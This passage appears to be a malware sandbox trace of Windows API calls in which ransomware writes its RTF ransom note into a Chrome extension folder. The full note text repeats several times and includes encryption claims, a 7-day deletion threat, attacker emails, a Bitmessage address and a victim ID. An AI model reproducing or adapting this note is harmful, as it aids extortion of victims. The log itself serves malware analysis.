u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nw̵\x94#Vç\x9f\x04Û\x03 6WZ\x83©{\x93Y(Á~\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.451] WriteFile (in: hFile=0x2ec, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.452] CloseHandle (hObject=0x2ec) returned 1 [0298.452] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\#readme_eman#.rtf")) returned 0xffffffff [0298.452] GetLastError () returned 0x2 [0298.452] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique 